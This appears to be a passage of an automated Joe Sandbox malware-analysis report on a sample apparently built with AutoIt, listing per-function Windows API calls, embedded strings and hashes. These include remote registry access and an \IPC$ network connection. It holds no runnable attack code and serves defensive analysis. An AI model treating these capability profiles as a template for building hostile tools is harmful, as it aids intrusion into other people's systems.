                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                • String ID: .dll$.exe$.icl
                                                • API String ID: 1212759294-1154884017
                                                • Opcode ID: bf878f45109867216fe8a1c6a20dbb51cd40e57ada1b0c6ef8d88e5dbc32ca93
                                                • Instruction ID: 0781c2cd2cde84dffbba6707b1cf087fad71bf84b2c9556a32e9cd03d77b0ae5
                                                • Opcode Fuzzy Hash: bf878f45109867216fe8a1c6a20dbb51cd40e57ada1b0c6ef8d88e5dbc32ca93
                                                • Instruction Fuzzy Hash: B661BE71600205BFEB66DF68CC41FBE7BA8EB08710F104559F955D61C1DB79AA80E7A0
                                                APIs
                                                • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00FE9C7F
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00FE9CA0
                                                • __swprintf.LIBCMT ref: 00FE9CF9
                                                • __swprintf.LIBCMT ref: 00FE9D12
                                                • _wprintf.LIBCMT ref: 00FE9DB9
                                                • _wprintf.LIBCMT ref: 00FE9DD7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 311963372-3080491070
                                                • Opcode ID: 8bfde5982bb429daca159f548217b09e7e8e3ff1909896beb1207e03f1d9b1b6
                                                • Instruction ID: 823aa3bd84b1942d9f586c25a1921da5e9d7451c0e99c003048d1a708e6be04a
                                                • Opcode Fuzzy Hash: 8bfde5982bb429daca159f548217b09e7e8e3ff1909896beb1207e03f1d9b1b6
                                                • Instruction Fuzzy Hash: 06519372900219ABCF24FBE1DE86EEEB779AF04300F200166F50572151EB796F58EB60
                                                APIs
                                                  • Part of subcall function 00F89837: __itow.LIBCMT ref: 00F89862
                                                  • Part of subcall function 00F89837: __swprintf.LIBCMT ref: 00F898AC
                                                • CharLowerBuffW.USER32(?,?), ref: 00FEA3CB
                                                • GetDriveTypeW.KERNEL32 ref: 00FEA418
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FEA460
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FEA497
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FEA4C5
                                                  • Part of subcall function 00F87BCC: _memmove.LIBCMT ref: 00F87C06
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 2698844021-4113822522
                                                • Opcode ID: 3dde3fb8a6f48a7729d2761326dfa054dee6990296eb42920e7e952adbeb2def
                                                • Instruction ID: 0ac3a0d52576859e207ef8594164bedd1829295aa58c01bee2728aa083205fd1
                                                • Opcode Fuzzy Hash: 3dde3fb8a6f48a7729d2761326dfa054dee6990296eb42920e7e952adbeb2def
                                                • Instruction Fuzzy Hash: E9515B755083059FC700FF21CC819AAB7E8EF88718F14895DF89A57261DB75EE0ADB42
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00FBE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00FDF8DF
                                                • LoadStringW.USER32(00000000,?,00FBE029,00000001), ref: 00FDF8E8
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                • GetModuleHandleW.KERNEL32(00000000,01045310,?,00000FFF,?,?,00FBE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00FDF90A
                                                • LoadStringW.USER32(00000000,?,00FBE029,00000001), ref: 00FDF90D
                                                • __swprintf.LIBCMT ref: 00FDF95D
                                                • __swprintf.LIBCMT ref: 00FDF96E
                                                • _wprintf.LIBCMT ref: 00FDFA17
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FDFA2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                • API String ID: 984253442-2268648507
                                                • Opcode ID: 0a49ce4264d7e2d59ce39cafdd8c80ee4c428038be7a1bcfbf48442f29d517a2
                                                • Instruction ID: 9993f97ccde8a343642e74acd2a5f08c95f328e478420b86e73ac209e566c271
                                                • Opcode Fuzzy Hash: 0a49ce4264d7e2d59ce39cafdd8c80ee4c428038be7a1bcfbf48442f29d517a2
                                                • Instruction Fuzzy Hash: 93415272800209ABCF15FBE0DD86EEEB77DAF54310F200065F506B6195EA399F09EB61
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,01009207,?,?), ref: 0100BA56
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,01009207,?,?,00000000,?), ref: 0100BA6D
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,01009207,?,?,00000000,?), ref: 0100BA78
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,01009207,?,?,00000000,?), ref: 0100BA85
                                                • GlobalLock.KERNEL32(00000000), ref: 0100BA8E
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,01009207,?,?,00000000,?), ref: 0100BA9D
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0100BAA6
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,01009207,?,?,00000000,?), ref: 0100BAAD
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,01009207,?,?,00000000,?), ref: 0100BABE
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,01012CAC,?), ref: 0100BAD7
                                                • GlobalFree.KERNEL32(00000000), ref: 0100BAE7
                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0100BB0B
                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0100BB36
                                                • DeleteObject.GDI32(00000000), ref: 0100BB5E
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0100BB74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3840717409-0
                                                • Opcode ID: e85eef54a80048097ea0f22f7aa399b976b89817d991facab4b57a1f70a9182e
                                                • Instruction ID: 79889dda42d934d9b5f60195bb1d1cfc0f37401d79a3f4aa726bb1dbf5b39b64
                                                • Opcode Fuzzy Hash: e85eef54a80048097ea0f22f7aa399b976b89817d991facab4b57a1f70a9182e
                                                • Instruction Fuzzy Hash: BF416C75500209AFDB32DF69DC48EAA7BB8FF89711F104068F985D7294C7759941DB20
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 00FEDA10
                                                • _wcscat.LIBCMT ref: 00FEDA28
                                                • _wcscat.LIBCMT ref: 00FEDA3A
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FEDA4F
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEDA63
                                                • GetFileAttributesW.KERNEL32(?), ref: 00FEDA7B
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00FEDA95
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEDAA7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                • String ID: *.*
                                                • API String ID: 34673085-438819550
                                                • Opcode ID: c3181d0bbbc5e9211a045489f0bcb1bea31ec56f18c4ff9ed314b6b03bc5dfa6
                                                • Instruction ID: 617aafdad1077f3b7fc03c16a42014f3283d370367d4a97b3f4213d70f41d4da
                                                • Opcode Fuzzy Hash: c3181d0bbbc5e9211a045489f0bcb1bea31ec56f18c4ff9ed314b6b03bc5dfa6
                                                • Instruction Fuzzy Hash: 8781B5729043819FCB24EF66CC40AAEB7E4BF85714F18482EF489CB652E734D944EB52
                                                APIs
                                                  • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0100C1FC
                                                • GetFocus.USER32 ref: 0100C20C
                                                • GetDlgCtrlID.USER32(00000000), ref: 0100C217
                                                • _memset.LIBCMT ref: 0100C342
                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0100C36D
                                                • GetMenuItemCount.USER32(?), ref: 0100C38D
                                                • GetMenuItemID.USER32(?,00000000), ref: 0100C3A0
                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0100C3D4
                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0100C41C
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0100C454
                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0100C489
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                • String ID: 0
                                                • API String ID: 1296962147-4108050209
                                                • Opcode ID: 2388edfa368b04e43bbfde595f4e654143ed9d91fbcda4eaff2ed7dd32c27b37
                                                • Instruction ID: c21a5e1df2e2d03c838348259822d19716efa2d18b49bd13e7fcc4917d0ff535
                                                • Opcode Fuzzy Hash: 2388edfa368b04e43bbfde595f4e654143ed9d91fbcda4eaff2ed7dd32c27b37
                                                • Instruction Fuzzy Hash: FF81A1702083019FF762DF18D984AABBBE4FB88714F0046ADFAD597291CB35D905DB52
                                                APIs
                                                • GetDC.USER32(00000000), ref: 00FF738F
                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00FF739B
                                                • CreateCompatibleDC.GDI32(?), ref: 00FF73A7
                                                • SelectObject.GDI32(00000000,?), ref: 00FF73B4
                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00FF7408
                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00FF7444
                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00FF7468
                                                • SelectObject.GDI32(00000006,?), ref: 00FF7470
                                                • DeleteObject.GDI32(?), ref: 00FF7479
                                                • DeleteDC.GDI32(00000006), ref: 00FF7480
                                                • ReleaseDC.USER32(00000000,?), ref: 00FF748B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                • String ID: (
                                                • API String ID: 2598888154-3887548279
                                                • Opcode ID: 1893dce614ef5c59d6e19ab34d29d662b2230de50e3fbccaa4ca48430860323d
                                                • Instruction ID: 95b64a6291bcf8ecc0e1e11dea3cf4d8543825b0a5f1f3109aa1ae9bd449958b
                                                • Opcode Fuzzy Hash: 1893dce614ef5c59d6e19ab34d29d662b2230de50e3fbccaa4ca48430860323d
                                                • Instruction Fuzzy Hash: 27516B7190430AEFCB25DFA8CC84EAEBBB9EF48310F14841DFA9997210D775A940EB50
                                                APIs
                                                  • Part of subcall function 00FA0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F86B0C,?,00008000), ref: 00FA0973
                                                  • Part of subcall function 00F84750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F84743,?,?,00F837AE,?), ref: 00F84770
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F86BAD
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00F86CFA
                                                  • Part of subcall function 00F8586D: _wcscpy.LIBCMT ref: 00F858A5
                                                  • Part of subcall function 00FA363D: _iswctype.LIBCMT ref: 00FA3645
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                • API String ID: 537147316-1018226102
                                                • Opcode ID: f9a53e6ca70400e0f60ea679ce35d9f1d297b984eee7f45bbcaec98f7b0d57e8
                                                • Instruction ID: 5b3389e54c987318a92a60ae6f9e54d318326e75b36467d36bd6f3e24883008c
                                                • Opcode Fuzzy Hash: f9a53e6ca70400e0f60ea679ce35d9f1d297b984eee7f45bbcaec98f7b0d57e8
                                                • Instruction Fuzzy Hash: 6B02CB715083419FCB20FF20C881AEFBBE5AF99314F14491DF48A972A1DB34D949EB52
                                                APIs
                                                • _memset.LIBCMT ref: 00FE2D50
                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00FE2DDD
                                                • GetMenuItemCount.USER32(01045890), ref: 00FE2E66
                                                • DeleteMenu.USER32(01045890,00000005,00000000,000000F5,?,?), ref: 00FE2EF6
                                                • DeleteMenu.USER32(01045890,00000004,00000000), ref: 00FE2EFE
                                                • DeleteMenu.USER32(01045890,00000006,00000000), ref: 00FE2F06
                                                • DeleteMenu.USER32(01045890,00000003,00000000), ref: 00FE2F0E
                                                • GetMenuItemCount.USER32(01045890), ref: 00FE2F16
                                                • SetMenuItemInfoW.USER32(01045890,00000004,00000000,00000030), ref: 00FE2F4C
                                                • GetCursorPos.USER32(?), ref: 00FE2F56
                                                • SetForegroundWindow.USER32(00000000), ref: 00FE2F5F
                                                • TrackPopupMenuEx.USER32(01045890,00000000,?,00000000,00000000,00000000), ref: 00FE2F72
                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FE2F7E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                • String ID:
                                                • API String ID: 3993528054-0
                                                • Opcode ID: 0b1cdfc4da8b23e594b0fa49f53cc60017214b91b379e2573b69de32e93b25a0
                                                • Instruction ID: 38c5deb63115e36326116eb96878ca5442cef62371eff127dcae194c1334fd2b
                                                • Opcode Fuzzy Hash: 0b1cdfc4da8b23e594b0fa49f53cc60017214b91b379e2573b69de32e93b25a0
                                                • Instruction Fuzzy Hash: 7A71E271A00296BBEB718F56DC85FAABF6CFF44324F100216F615AA1D1D7B66C10EB90
                                                APIs
                                                  • Part of subcall function 00F87BCC: _memmove.LIBCMT ref: 00F87C06
                                                • _memset.LIBCMT ref: 00FD786B
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FD78A0
                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FD78BC
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FD78D8
                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FD7902
                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00FD792A
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FD7935
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FD793A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                • API String ID: 1411258926-22481851
                                                • Opcode ID: 7063575c640db31e04f385cf8cfbf1eb84d7feaae4138ca30d3a5ad3d75a87c8
                                                • Instruction ID: e8cc47d6372308b4712f33090a55a21753440a0a04a26cda18030b56a9831076
                                                • Opcode Fuzzy Hash: 7063575c640db31e04f385cf8cfbf1eb84d7feaae4138ca30d3a5ad3d75a87c8
                                                • Instruction Fuzzy Hash: 2A413872C14229ABCF21FBA4DC85DEEB778BF04710F04402AF805A7261EA359E04EB90
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FFFDAD,?,?), ref: 01000E31
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                • API String ID: 3964851224-909552448
                                                • Opcode ID: f027561905bf20d314e9783a9cbd4d5ba74f72eb45de9d079edfb155d51402e3
                                                • Instruction ID: 1ab035c6597d8b54bbd5a5de7b34cfeb8eebfe3111bfb615d3c61cf5f3f85806
                                                • Opcode Fuzzy Hash: f027561905bf20d314e9783a9cbd4d5ba74f72eb45de9d079edfb155d51402e3
                                                • Instruction Fuzzy Hash: AC41587110025A8BEF02EF14EC51BFE37A4BF42384F184458FC951B69ADF799919EBA0
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FBE2A0,00000010,?,Bad directive syntax error,0100F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FDF7C2
                                                • LoadStringW.USER32(00000000,?,00FBE2A0,00000010), ref: 00FDF7C9
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                • _wprintf.LIBCMT ref: 00FDF7FC
                                                • __swprintf.LIBCMT ref: 00FDF81E
                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FDF88D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
